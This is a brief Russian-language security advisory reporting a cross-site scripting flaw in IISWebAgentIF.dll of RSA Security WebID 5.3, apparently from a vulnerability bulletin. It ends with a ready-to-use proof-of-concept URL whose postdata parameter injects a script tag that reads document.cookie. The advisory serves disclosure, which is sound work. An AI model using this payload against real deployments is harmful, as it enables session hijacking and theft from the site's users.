Программа: RSA Security WebID 5.3
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в IISWebAgentIF.dll. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
https://www.example.com/WebID/IISWebAgentIF.dll?stage=useridandpasscode& amp;referrer=Z2F&sessionid=0&authntype=2& username=a&passcode=a&postdata=aaa"%20> <SCRIPT>alert(document.cookie)</script><!--
